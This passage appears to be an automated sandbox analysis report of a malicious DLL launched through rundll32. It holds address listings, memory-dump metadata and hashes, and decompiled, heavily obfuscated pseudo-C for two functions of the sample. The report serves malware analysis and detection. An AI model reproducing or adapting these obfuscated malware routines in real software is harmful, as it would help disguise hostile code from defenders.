                                                                                                                                                            0x0038fdd4
                                                                                                                                                            0x0038fdd6
                                                                                                                                                            0x0038fddc
                                                                                                                                                            0x0038fde0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fde0
                                                                                                                                                            0x0038fca5
                                                                                                                                                            0x0038fd4c
                                                                                                                                                            0x0038fd55
                                                                                                                                                            0x0038fd60
                                                                                                                                                            0x0038fd75
                                                                                                                                                            0x0038fd76
                                                                                                                                                            0x0038fd77
                                                                                                                                                            0x0038fd78
                                                                                                                                                            0x0038fd8a
                                                                                                                                                            0x0038fd9c
                                                                                                                                                            0x0038fda1
                                                                                                                                                            0x0038fda4
                                                                                                                                                            0x0038fd0b
                                                                                                                                                            0x0038fd0b
                                                                                                                                                            0x0038fc7c
                                                                                                                                                            0x0038fc7c
                                                                                                                                                            0x0038fc7c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fc7c
                                                                                                                                                            0x0038fc7c
                                                                                                                                                            0x0038fcb1
                                                                                                                                                            0x0038fcb9
                                                                                                                                                            0x0038fcdd
                                                                                                                                                            0x0038fce2
                                                                                                                                                            0x0038fcea
                                                                                                                                                            0x0038fcfa
                                                                                                                                                            0x0038fcfb
                                                                                                                                                            0x0038fcfc
                                                                                                                                                            0x0038fcfe
                                                                                                                                                            0x0038fd03
                                                                                                                                                            0x0038fd08
                                                                                                                                                            0x0038fd08
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fcbb
                                                                                                                                                            0x0038fcc1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fcc7
                                                                                                                                                            0x0038fcc7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fcc7
                                                                                                                                                            0x0038fcc1
                                                                                                                                                            0x0038ffc2
                                                                                                                                                            0x0038ffc2
                                                                                                                                                            0x0038ffc2
                                                                                                                                                            0x0038fd1b
                                                                                                                                                            0x0038fd2d
                                                                                                                                                            0x0038fd2e
                                                                                                                                                            0x0038fd2f
                                                                                                                                                            0x0038fd34
                                                                                                                                                            0x0038fd3d
                                                                                                                                                            0x0038fd3f
                                                                                                                                                            0x0038fd45
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fd45
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fd3f
                                                                                                                                                            0x0038fde8
                                                                                                                                                            0x0038fdee
                                                                                                                                                            0x0038ff6b
                                                                                                                                                            0x0038ff70
                                                                                                                                                            0x0038ff7e
                                                                                                                                                            0x0038ff8b
                                                                                                                                                            0x0038ff8c
                                                                                                                                                            0x0038ff8d
                                                                                                                                                            0x0038ff8f
                                                                                                                                                            0x0038ff94
                                                                                                                                                            0x0038ff98
                                                                                                                                                            0x0038ff9b
                                                                                                                                                            0x0038ffa0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fdf4
                                                                                                                                                            0x0038fdf4
                                                                                                                                                            0x0038fdfa
                                                                                                                                                            0x0038fede
                                                                                                                                                            0x0038fef5
                                                                                                                                                            0x0038fef7
                                                                                                                                                            0x0038ff00
                                                                                                                                                            0x0038ff02
                                                                                                                                                            0x0038ff04
                                                                                                                                                            0x0038ff06
                                                                                                                                                            0x0038ff0f
                                                                                                                                                            0x0038ff0f
                                                                                                                                                            0x0038ff11
                                                                                                                                                            0x0038ff13
                                                                                                                                                            0x0038ff15
                                                                                                                                                            0x0038ff18
                                                                                                                                                            0x0038ff18
                                                                                                                                                            0x0038ff18
                                                                                                                                                            0x0038ff2a
                                                                                                                                                            0x0038ff2f
                                                                                                                                                            0x0038ff3d
                                                                                                                                                            0x0038ff46
                                                                                                                                                            0x0038ff47
                                                                                                                                                            0x0038ff48
                                                                                                                                                            0x0038ff4a
                                                                                                                                                            0x0038ff4f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fe00
                                                                                                                                                            0x0038fe00
                                                                                                                                                            0x0038fe06
                                                                                                                                                            0x0038febe
                                                                                                                                                            0x0038fec3
                                                                                                                                                            0x0038fec7
                                                                                                                                                            0x0038feca
                                                                                                                                                            0x0038fecf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fe0c
                                                                                                                                                            0x0038fe0c
                                                                                                                                                            0x0038fe12
                                                                                                                                                            0x00390049
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0039004f
                                                                                                                                                            0x0038fe18
                                                                                                                                                            0x0038fe1a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fe20
                                                                                                                                                            0x0038fe20
                                                                                                                                                            0x0038fe2c
                                                                                                                                                            0x0038fe30
                                                                                                                                                            0x0038fe37
                                                                                                                                                            0x0038fe9a
                                                                                                                                                            0x0038fe9d
                                                                                                                                                            0x0038fea2
                                                                                                                                                            0x0038fea5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fea5
                                                                                                                                                            0x0038fe1a
                                                                                                                                                            0x0038fe06
                                                                                                                                                            0x0038fdfa
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ffa5
                                                                                                                                                            0x0038ffa5
                                                                                                                                                            0x0038ffa5
                                                                                                                                                            0x0038ffb1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ffb1

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`2$:B8$;r$[h~$y8$|%$&e$0{
                                                                                                                                                            • API String ID: 0-4140840388
                                                                                                                                                            • Opcode ID: 7b98d438123a156397cf6e07be6ea1e6d04070b04520a646f39c9bd5ad59e55f
                                                                                                                                                            • Instruction ID: fac29024cd48fe1532f8eb2600d4b0f05ca6911e435de532fce5c3beb7d84a17
                                                                                                                                                            • Opcode Fuzzy Hash: 7b98d438123a156397cf6e07be6ea1e6d04070b04520a646f39c9bd5ad59e55f
                                                                                                                                                            • Instruction Fuzzy Hash: FC5240725093808FD3B9DF25C58AB8BFBE1BBC4308F10891DE19996260DBB49949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100453C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Version$ClipboardFormatRegister
                                                                                                                                                            • String ID: MSWHEEL_ROLLMSG
                                                                                                                                                            • API String ID: 2888461884-2485103130
                                                                                                                                                            • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                                            • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                                                            • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                                            • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038CB5B Relevance: 10.3, Strings: 8, Instructions: 335COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                            			E0038CB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t341;
				void* _t370;
				void* _t379;
				intOrPtr _t382;
				intOrPtr _t385;
				void* _t396;
				intOrPtr _t399;
				intOrPtr _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int* _t449;

				_push(_a12);
				_t436 = 0;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E003820B9(_t341);
				_v1572 = 0xe82680;
				_t449 =  &(( &_v1708)[5]);
				_v1568 = 0;
				_v1564 = 0;
				_t396 = 0x9368da1;
				_v1584 = 0x42403b;
				_v1584 = _v1584 + 0xffffd771;
				_v1584 = _v1584 ^ 0x00421785;
				_v1692 = 0xc00255;
				_t437 = 0x16;
				_v1692 = _v1692 / _t437;
				_v1692 = _v1692 + 0xffff6b87;
				_v1692 = _v1692 + 0xffff176e;
				_v1692 = _v1692 ^ 0x0004c90f;
				_v1668 = 0x5abcaa;
				_v1668 = _v1668 | 0xa6adf3e3;
				_v1668 = _v1668 + 0xffff713c;
				_v1668 = _v1668 << 6;
				_v1668 = _v1668 ^ 0xbfd49dc8;
				_v1700 = 0xb35187;
				_v1700 = _v1700 | 0x50a44dff;
				_v1700 = _v1700 + 0xfffff2e6;
				_v1700 = _v1700 >> 8;
				_v1700 = _v1700 ^ 0x0051b9c1;
				_v1644 = 0x4d7cc3;
				_v1644 = _v1644 + 0xffffa786;
				_v1644 = _v1644 | 0x8b8a715e;
				_v1644 = _v1644 ^ 0x6234f021;
				_v1644 = _v1644 ^ 0xe9f998a6;
				_v1624 = 0x204c5b;
				_v1624 = _v1624 + 0xffffa901;
				_v1624 = _v1624 + 0x49e1;
				_v1624 = _v1624 ^ 0x002fe6aa;
				_v1632 = 0xbb0a9b;
				_v1632 = _v1632 * 0x52;
				_v1632 = _v1632 | 0x83893080;
				_v1632 = _v1632 ^ 0xbbe905c0;
				_v1620 = 0x19fb1a;
				_v1620 = _v1620 | 0x985eae3d;
				_v1620 = _v1620 + 0xf613;
				_v1620 = _v1620 ^ 0x9864c971;
				_v1656 = 0x35ecb4;
				_v1656 = _v1656 * 0x29;
				_v1656 = _v1656 + 0x1081;
				_v1656 = _v1656 + 0xffffd324;
				_v1656 = _v1656 ^ 0x08a8fe56;
				_v1580 = 0xc60f6f;
				_v1580 = _v1580 + 0xffffd3e6;
				_v1580 = _v1580 ^ 0x00c233ea;
				_v1664 = 0x2df5c;
				_v1664 = _v1664 << 8;
				_v1664 = _v1664 * 0x4c;
				_v1664 = _v1664 + 0xffffaed7;
				_v1664 = _v1664 ^ 0xda40187b;
				_v1672 = 0x38409b;
				_v1672 = _v1672 * 0x33;
				_v1672 = _v1672 | 0x7fcdffbb;
				_v1672 = _v1672 ^ 0x7ff87770;
				_v1680 = 0xe751cb;
				_v1680 = _v1680 ^ 0x8590ed7d;
				_v1680 = _v1680 + 0xffffebc9;
				_v1680 = _v1680 * 0x5e;
				_v1680 = _v1680 ^ 0x01e2719c;
				_v1688 = 0x15e1cd;
				_v1688 = _v1688 + 0xfe19;
				_v1688 = _v1688 + 0xffffc88c;
				_v1688 = _v1688 << 7;
				_v1688 = _v1688 ^ 0x0b5f3deb;
				_v1696 = 0x33a377;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xfb2d04b5;
				_v1696 = _v1696 | 0xd2f07883;
				_v1696 = _v1696 ^ 0xf7fa7ce3;
				_v1640 = 0x94004d;
				_v1640 = _v1640 >> 0xa;
				_t438 = 0x67;
				_v1640 = _v1640 * 0x3d;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x00039ca1;
				_v1648 = 0xfcfef3;
				_v1648 = _v1648 * 0x18;
				_v1648 = _v1648 + 0x9c71;
				_v1648 = _v1648 | 0xf5d6202a;
				_v1648 = _v1648 ^ 0xf7f57601;
				_v1596 = 0xc58f80;
				_v1596 = _v1596 + 0xffff2f17;
				_v1596 = _v1596 ^ 0x00ce700d;
				_v1684 = 0xee980b;
				_v1684 = _v1684 >> 6;
				_v1684 = _v1684 / _t438;
				_v1684 = _v1684 + 0xffff2a3f;
				_v1684 = _v1684 ^ 0xfff3655c;
				_v1652 = 0x45a4a9;
				_v1652 = _v1652 >> 0xe;
				_t439 = 0x6e;
				_v1652 = _v1652 * 0x51;
				_v1652 = _v1652 + 0x9be3;
				_v1652 = _v1652 ^ 0x0004d4d8;
				_v1708 = 0x222243;
				_t176 =  &_v1708; // 0x222243
				_v1708 =  *_t176 / _t439;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xffff4a12;
				_v1708 = _v1708 ^ 0x009b5339;
				_v1612 = 0x464ea3;
				_v1612 = _v1612 + 0x89cc;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 ^ 0x00167067;
				_v1588 = 0xd74d9e;
				_v1588 = _v1588 | 0x529da741;
				_v1588 = _v1588 ^ 0x52d09c78;
				_v1628 = 0x60b5eb;
				_v1628 = _v1628 >> 9;
				_t440 = 0x19;
				_v1628 = _v1628 / _t440;
				_v1628 = _v1628 ^ 0x000ff1bc;
				_v1676 = 0xfb7b01;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffffc28e;
				_t441 = 0x1b;
				_v1676 = _v1676 / _t441;
				_v1676 = _v1676 ^ 0x0096cb21;
				_v1660 = 0xed67c1;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 | 0xef7d69c8;
				_v1660 = _v1660 << 2;
				_v1660 = _v1660 ^ 0xfff42fe1;
				_v1604 = 0x46c7e8;
				_v1604 = _v1604 << 0xf;
				_v1604 = _v1604 ^ 0x63fe3710;
				_v1636 = 0x7a345b;
				_v1636 = _v1636 + 0xd479;
				_v1636 = _v1636 + 0x8c7f;
				_v1636 = _v1636 ^ 0x00708a00;
				_v1704 = 0x80508e;
				_v1704 = _v1704 ^ 0xf958081f;
				_t442 = 0x4b;
				_v1704 = _v1704 / _t442;
				_t443 = 0x34;
				_v1704 = _v1704 * 0x44;
				_v1704 = _v1704 ^ 0xe2885afb;
				_v1576 = 0x325f4f;
				_t259 =  &_v1576; // 0x325f4f
				_v1576 =  *_t259 * 0x7a;
				_v1576 = _v1576 ^ 0x180920ed;
				_v1592 = 0xd554f9;
				_v1592 = _v1592 * 0x4e;
				_v1592 = _v1592 ^ 0x40f8e8dd;
				_v1608 = 0x6be570;
				_v1608 = _v1608 + 0x3d4f;
				_v1608 = _v1608 ^ 0x4461575c;
				_v1608 = _v1608 ^ 0x440eeedf;
				_v1616 = 0x4acfbf;
				_v1616 = _v1616 / _t443;
				_t444 = 0xe;
				_v1616 = _v1616 / _t444;
				_v1616 = _v1616 ^ 0x000fdd65;
				_v1600 = 0x55de88;
				_v1600 = _v1600 << 2;
				_v1600 = _v1600 ^ 0x01580110;
				do {
					while(_t396 != 0x196a97b) {
						if(_t396 == 0x2ca432c) {
							_push(_v1652);
							_push(_v1684);
							_t379 = E0038DCF7(_v1596, 0x3710f0, __eflags);
							E0038176B( &_v1560, __eflags);
							_t382 =  *0x393e10; // 0x0
							_t385 =  *0x393e10; // 0x0
							E0038E32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
							E0037A8B0(_v1704, _t379, _v1576);
							_t449 =  &(_t449[0xf]);
							_t396 = 0x9d0e956;
							continue;
						} else {
							if(_t396 == 0x9368da1) {
								_push(_v1644);
								_push(_v1584);
								_push(_v1700);
								_push( &_v1040);
								E003846BB(_v1692, _v1668);
								_t449 = _t449 - 0xc + 0x1c;
								_t396 = 0x196a97b;
								continue;
							} else {
								_t456 = _t396 - 0x9d0e956;
								if(_t396 != 0x9d0e956) {
									goto L10;
								} else {
									_push(_v1600);
									_push(_t436);
									_push(_t396);
									_push(_t436);
									_push(_t436);
									_push(_v1616);
									_push( &_v520);
									E0037AB87(_v1592, _v1608, _t456);
									_t436 =  !=  ? 1 : _t436;
								}
							}
						}
						L6:
						return _t436;
					}
					_push(_v1620);
					_push(_v1632);
					_t370 = E0038DCF7(_v1624, 0x371020, __eflags);
					E0038176B( &_v1560, __eflags);
					_t399 =  *0x393e10; // 0x0
					_t336 = _t399 + 0x1c; // 0x1c
					_t337 = _t399 + 0x23c; // 0x23c
					E00381652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
					E0037A8B0(_v1640, _t370, _v1648);
					_t449 =  &(_t449[0xf]);
					_t396 = 0x9d0e956;
					L10:
					__eflags = _t396 - 0xce3b296;
				} while (__eflags != 0);
				goto L6;
			}




























































                                                                                                                                                            0x0038cb65
                                                                                                                                                            0x0038cb6c
                                                                                                                                                            0x0038cb6e
                                                                                                                                                            0x0038cb75
                                                                                                                                                            0x0038cb7c
                                                                                                                                                            0x0038cb7d
                                                                                                                                                            0x0038cb7e
                                                                                                                                                            0x0038cb83
                                                                                                                                                            0x0038cb8e
                                                                                                                                                            0x0038cb91
                                                                                                                                                            0x0038cb9a
                                                                                                                                                            0x0038cba1
                                                                                                                                                            0x0038cba6
                                                                                                                                                            0x0038cbb1
                                                                                                                                                            0x0038cbbc
                                                                                                                                                            0x0038cbc7
                                                                                                                                                            0x0038cbd5
                                                                                                                                                            0x0038cbd8
                                                                                                                                                            0x0038cbdc
                                                                                                                                                            0x0038cbe4
                                                                                                                                                            0x0038cbec
                                                                                                                                                            0x0038cbf4
                                                                                                                                                            0x0038cbfc
                                                                                                                                                            0x0038cc04
                                                                                                                                                            0x0038cc0c
                                                                                                                                                            0x0038cc11
                                                                                                                                                            0x0038cc19
                                                                                                                                                            0x0038cc21
                                                                                                                                                            0x0038cc29
                                                                                                                                                            0x0038cc31
                                                                                                                                                            0x0038cc36
                                                                                                                                                            0x0038cc3e
                                                                                                                                                            0x0038cc46
                                                                                                                                                            0x0038cc4e
                                                                                                                                                            0x0038cc56
                                                                                                                                                            0x0038cc5e
                                                                                                                                                            0x0038cc66
                                                                                                                                                            0x0038cc6e
                                                                                                                                                            0x0038cc76
                                                                                                                                                            0x0038cc7e
                                                                                                                                                            0x0038cc86
                                                                                                                                                            0x0038cc93
                                                                                                                                                            0x0038cc97
                                                                                                                                                            0x0038cc9f
                                                                                                                                                            0x0038cca7
                                                                                                                                                            0x0038ccaf
                                                                                                                                                            0x0038ccb7
                                                                                                                                                            0x0038ccbf
                                                                                                                                                            0x0038ccc7
                                                                                                                                                            0x0038ccd4
                                                                                                                                                            0x0038ccd8
                                                                                                                                                            0x0038cce0
                                                                                                                                                            0x0038cce8
                                                                                                                                                            0x0038ccf0
                                                                                                                                                            0x0038ccfb
                                                                                                                                                            0x0038cd06
                                                                                                                                                            0x0038cd11
                                                                                                                                                            0x0038cd19
                                                                                                                                                            0x0038cd23
                                                                                                                                                            0x0038cd27
                                                                                                                                                            0x0038cd2f
                                                                                                                                                            0x0038cd37
                                                                                                                                                            0x0038cd44
                                                                                                                                                            0x0038cd48
                                                                                                                                                            0x0038cd50
                                                                                                                                                            0x0038cd58
                                                                                                                                                            0x0038cd60
                                                                                                                                                            0x0038cd68
                                                                                                                                                            0x0038cd75
                                                                                                                                                            0x0038cd7b
                                                                                                                                                            0x0038cd83
                                                                                                                                                            0x0038cd8b
                                                                                                                                                            0x0038cd93
                                                                                                                                                            0x0038cd9b
                                                                                                                                                            0x0038cda0
                                                                                                                                                            0x0038cda8
                                                                                                                                                            0x0038cdb0
                                                                                                                                                            0x0038cdb5
                                                                                                                                                            0x0038cdbd
                                                                                                                                                            0x0038cdc5
                                                                                                                                                            0x0038cdcd
                                                                                                                                                            0x0038cdd5
                                                                                                                                                            0x0038cde1
                                                                                                                                                            0x0038cde4
                                                                                                                                                            0x0038cde8
                                                                                                                                                            0x0038cded
                                                                                                                                                            0x0038cdf5
                                                                                                                                                            0x0038ce02
                                                                                                                                                            0x0038ce06
                                                                                                                                                            0x0038ce0e
                                                                                                                                                            0x0038ce16
                                                                                                                                                            0x0038ce1e
                                                                                                                                                            0x0038ce29
                                                                                                                                                            0x0038ce34
                                                                                                                                                            0x0038ce3f
                                                                                                                                                            0x0038ce47
                                                                                                                                                            0x0038ce54
                                                                                                                                                            0x0038ce58
                                                                                                                                                            0x0038ce60
                                                                                                                                                            0x0038ce68
                                                                                                                                                            0x0038ce70
                                                                                                                                                            0x0038ce7a
                                                                                                                                                            0x0038ce7d
                                                                                                                                                            0x0038ce81
                                                                                                                                                            0x0038ce89
                                                                                                                                                            0x0038ce91
                                                                                                                                                            0x0038ce99
                                                                                                                                                            0x0038cea1
                                                                                                                                                            0x0038cea5
                                                                                                                                                            0x0038ceaa
                                                                                                                                                            0x0038ceb2
                                                                                                                                                            0x0038ceba
                                                                                                                                                            0x0038cec2
                                                                                                                                                            0x0038ceca
                                                                                                                                                            0x0038cecf
                                                                                                                                                            0x0038ced7
                                                                                                                                                            0x0038cee2
                                                                                                                                                            0x0038ceed
                                                                                                                                                            0x0038cef8
                                                                                                                                                            0x0038cf00
                                                                                                                                                            0x0038cf09
                                                                                                                                                            0x0038cf0e
                                                                                                                                                            0x0038cf14
                                                                                                                                                            0x0038cf1c
                                                                                                                                                            0x0038cf24
                                                                                                                                                            0x0038cf29
                                                                                                                                                            0x0038cf35
                                                                                                                                                            0x0038cf38
                                                                                                                                                            0x0038cf3c
                                                                                                                                                            0x0038cf44
                                                                                                                                                            0x0038cf4c
                                                                                                                                                            0x0038cf51
                                                                                                                                                            0x0038cf5b
                                                                                                                                                            0x0038cf65
                                                                                                                                                            0x0038cf72
                                                                                                                                                            0x0038cf7a
                                                                                                                                                            0x0038cf7f
                                                                                                                                                            0x0038cf87
                                                                                                                                                            0x0038cf8f
                                                                                                                                                            0x0038cf97
                                                                                                                                                            0x0038cf9f
                                                                                                                                                            0x0038cfa7
                                                                                                                                                            0x0038cfaf
                                                                                                                                                            0x0038cfbd
                                                                                                                                                            0x0038cfc2
                                                                                                                                                            0x0038cfcd
                                                                                                                                                            0x0038cfd0
                                                                                                                                                            0x0038cfd4
                                                                                                                                                            0x0038cfdc
                                                                                                                                                            0x0038cfe7
                                                                                                                                                            0x0038cfef
                                                                                                                                                            0x0038cff6
                                                                                                                                                            0x0038d001
                                                                                                                                                            0x0038d014
                                                                                                                                                            0x0038d01b
                                                                                                                                                            0x0038d026
                                                                                                                                                            0x0038d02e
                                                                                                                                                            0x0038d036
                                                                                                                                                            0x0038d03e
                                                                                                                                                            0x0038d046
                                                                                                                                                            0x0038d056
                                                                                                                                                            0x0038d05e
                                                                                                                                                            0x0038d061
                                                                                                                                                            0x0038d065
                                                                                                                                                            0x0038d06d
                                                                                                                                                            0x0038d075
                                                                                                                                                            0x0038d07a
                                                                                                                                                            0x0038d082
                                                                                                                                                            0x0038d082
                                                                                                                                                            0x0038d090
                                                                                                                                                            0x0038d119
                                                                                                                                                            0x0038d122
                                                                                                                                                            0x0038d12d
                                                                                                                                                            0x0038d13b
                                                                                                                                                            0x0038d149
                                                                                                                                                            0x0038d16e
                                                                                                                                                            0x0038d19b
                                                                                                                                                            0x0038d1ad
                                                                                                                                                            0x0038d1b2
                                                                                                                                                            0x0038d1b5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d096
                                                                                                                                                            0x0038d09c
                                                                                                                                                            0x0038d0e8
                                                                                                                                                            0x0038d0f3
                                                                                                                                                            0x0038d0fa
                                                                                                                                                            0x0038d109
                                                                                                                                                            0x0038d10a
                                                                                                                                                            0x0038d10f
                                                                                                                                                            0x0038d112
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d09e
                                                                                                                                                            0x0038d09e
                                                                                                                                                            0x0038d0a0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d0a6
                                                                                                                                                            0x0038d0a6
                                                                                                                                                            0x0038d0b1
                                                                                                                                                            0x0038d0b2
                                                                                                                                                            0x0038d0b3
                                                                                                                                                            0x0038d0b4
                                                                                                                                                            0x0038d0b5
                                                                                                                                                            0x0038d0ca
                                                                                                                                                            0x0038d0cb
                                                                                                                                                            0x0038d0d8
                                                                                                                                                            0x0038d0d8
                                                                                                                                                            0x0038d0a0
                                                                                                                                                            0x0038d09c
                                                                                                                                                            0x0038d0db
                                                                                                                                                            0x0038d0e7
                                                                                                                                                            0x0038d0e7
                                                                                                                                                            0x0038d1bc
                                                                                                                                                            0x0038d1c5
                                                                                                                                                            0x0038d1cd
                                                                                                                                                            0x0038d1db
                                                                                                                                                            0x0038d212
                                                                                                                                                            0x0038d21f
                                                                                                                                                            0x0038d223
                                                                                                                                                            0x0038d22e
                                                                                                                                                            0x0038d243
                                                                                                                                                            0x0038d248
                                                                                                                                                            0x0038d24b
                                                                                                                                                            0x0038d24d
                                                                                                                                                            0x0038d24d
                                                                                                                                                            0x0038d24d
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                            • String ID: ;@B$C""$M$O_2$[4z$[L $\WaD$I
                                                                                                                                                            • API String ID: 1514166925-553023378
                                                                                                                                                            • Opcode ID: 2bc31844bece6b4c86398259bef343bec7728b8658e81dff346adaa1b87d7edd
                                                                                                                                                            • Instruction ID: f9d542c0d50017c0a46ebfb4a9f1c2c05e281fdf454da70a5207c98bdf583674
                                                                                                                                                            • Opcode Fuzzy Hash: 2bc31844bece6b4c86398259bef343bec7728b8658e81dff346adaa1b87d7edd
                                                                                                                                                            • Instruction Fuzzy Hash: 79021EB15083819FD3A5DF25C98AA8BFBF5BBC4718F10891DF1D986260D7B1894ACF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003770B3 Relevance: 10.3, Strings: 8, Instructions: 273COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E003770B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t276;
				intOrPtr _t301;
				void* _t302;
				intOrPtr _t305;
				void* _t306;
				intOrPtr _t312;
				intOrPtr* _t314;
				void* _t316;
				intOrPtr _t340;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int* _t352;

				_t342 = _a4;
				_t314 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t276);
				_v8 = 0xc5496b;
				_t340 = 0;
				_v4 = 0;
				_t352 =  &(( &_v128)[5]);
				_v96 = 0xa893e5;
				_v96 = _v96 >> 0xb;
				_t316 = 0x77ea95;
				_v96 = _v96 ^ 0xaec74c08;
				_v96 = _v96 + 0xffff5908;
				_v96 = _v96 ^ 0xaec6b223;
				_v120 = 0x460837;
